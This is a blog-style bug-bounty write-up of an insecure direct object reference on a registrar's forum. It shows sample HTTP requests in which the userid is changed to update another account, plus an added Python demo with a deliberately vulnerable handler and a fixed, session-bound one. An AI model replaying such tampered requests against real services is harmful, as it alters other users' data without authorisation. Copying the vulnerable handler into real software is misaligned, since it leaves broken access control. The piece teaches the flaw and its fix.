Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
I want to share a story about how I made one thousand bucks from a very simple IDOR vulnerability.
I was on a forum run by one of the biggest domain name registrars and web hosting companies in Indonesia. For some reason I updated my profile information, and while doing so I opened Chrome DevTools and analyzed the HTTP request.
POST /api/v1/update/profile HTTP/2
Host: *****
[...]
{
"data" :{
"userid" : 3111,
"name" : "JJ",
"email" : "[email protected]",
[...]
}
}

{
"status" : "success",
"data" :{
"userid" : 3111,
"name" : "JJ",
"email" : "[email protected]",
[...]
}
}
You can clearly see that the userid is also sent in the HTTP request body. So, I registered a second account and tried putting its userid in the HTTP request.
POST /api/v1/update/profile HTTP/2
Host: *****
[...]
{
"data" :{
"userid" : 3112,
"name" : "JJ",
"email" : "[email protected]",
[...]
}
}

{
"status" : "success",
"data" :{
"userid" : 3112,
"name" : "JJ",
"email" : "[email protected]",
[...]
}
}
Gotcha! My second account, which has UID 3112, was successfully updated: the server trusted the userid in the body instead of the identity of the logged-in session.
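To show the server-side mistake behind this bug, here is an added example (not code from the original post or the affected site): a minimal, stdlib-only model of the /api/v1/update/profile handler, once trusting the userid from the JSON body and once binding the update to the session. The user ids and profile records are constructed sample data.

```python
# Added example: the IDOR pattern from the write-up, modelled server-side.
# session_userid is what the server knows from the cookie/token; raw_body is
# the JSON the client sent, which also carries "data.userid".
import copy
import json

# Constructed sample data: account 3111 (the tester) and 3112 (the second account).
SAMPLE_PROFILES = {
    3111: {"name": "JJ", "email": "jj@example.invalid"},
    3112: {"name": "Other", "email": "other@example.invalid"},
}


class Forbidden(Exception):
    """Raised when the caller may not modify the requested object."""


def update_profile_vulnerable(profiles, session_userid, raw_body):
    """IDOR: the object reference is taken from user-supplied input."""
    data = json.loads(raw_body)["data"]
    target = data["userid"]  # attacker-controlled; session_userid is ignored
    profiles[target].update({k: v for k, v in data.items() if k != "userid"})
    return {"status": "success", "data": {"userid": target, **profiles[target]}}


def update_profile_fixed(profiles, session_userid, raw_body):
    """The object reference comes from the session, never from the body."""
    data = json.loads(raw_body)["data"]
    # If a client still sends userid it must match the session; a mismatch is
    # rejected and is worth logging as a probe against the access control.
    if "userid" in data and data["userid"] != session_userid:
        raise Forbidden(f"session {session_userid} tried to modify userid {data['userid']}")
    profiles[session_userid].update({k: v for k, v in data.items() if k != "userid"})
    return {"status": "success",
            "data": {"userid": session_userid, **profiles[session_userid]}}


def demo():
    """Replay the write-up: session 3111 sends a body naming userid 3112."""
    body = json.dumps({"data": {"userid": 3112, "name": "JJ"}})
    vuln = copy.deepcopy(SAMPLE_PROFILES)
    update_profile_vulnerable(vuln, session_userid=3111, raw_body=body)
    fixed = copy.deepcopy(SAMPLE_PROFILES)
    try:
        update_profile_fixed(fixed, session_userid=3111, raw_body=body)
        blocked = False
    except Forbidden:
        blocked = True
    # Returns (name of 3112 after vulnerable call, after fixed call, was it blocked)
    return vuln[3112]["name"], fixed[3112]["name"], blocked


if __name__ == "__main__":
    print(demo())  # ('JJ', 'Other', True)
```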
Reference:
https://portswigger.net/web-security/access-control/idor